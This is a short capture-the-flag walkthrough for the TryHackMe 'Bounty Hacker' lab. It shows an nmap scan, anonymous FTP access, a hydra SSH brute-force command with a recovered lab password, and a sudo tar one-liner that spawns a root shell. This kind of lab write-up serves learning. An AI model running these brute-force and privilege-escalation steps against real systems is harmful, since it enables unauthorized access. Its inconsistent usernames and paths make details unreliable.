Bounty Hacker | Walkthrough | Tryhackme

Bounty Hacker | Walkthrough | Tryhackme

///////////////////BOUNTY HACKER//////////////////

                            |||]/ SCANNING \[|||

Started the nmap scan — nmap -sC -sV -T3 10.10.167.41

Result —

||

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 23:23 IST
Nmap scan report for 10.10.167.41
Host is up (0.36s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can’t get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 – secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

||

As you can see 3 ports are open right now!
ANONYMOUS LOGIN IS ALLOWED 🙂
—————————

After Getting into FTP we got two files from there —
1.LOCKS.TXT
2.TASK.TXT

][[—-[[[

In Locks.txt we have the credentials or passwords —

In Task.txt we have the warning with the user name – lin.

|||/ Gaining access Bounty hunter  \|||

WE HAVE THE PASSWORDS AND THE USER LET’S TRY TO BRUTE FORCE THE USER: PASSWORD WITH HYDRA !!

|||||

hydra -l lin -P locks.txt 10.10.234.166 -t 4 -e nsr ssh

|||||

Result — We found the password for the user len: RedDr4gonSynd1cat3

Now we have the access to the ssh shell with user lin and cat user.txt!!

|||/ Privilage Esclitation \|||

WE ARE TRYING TO GET THE ROOT PASSWORD FOR THE ROOT.TXT

———————–

By Typing the Sudo -l we got to know that len can run the /tar/bin file with root privileges–

After going to GTFO bins I found a command for getting root–

sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh

By typing this we have the root user and we can now view the root.txt!!

////////////////BOUNTY HACKER////////////////

 

Leave a Reply

Your email address will not be published.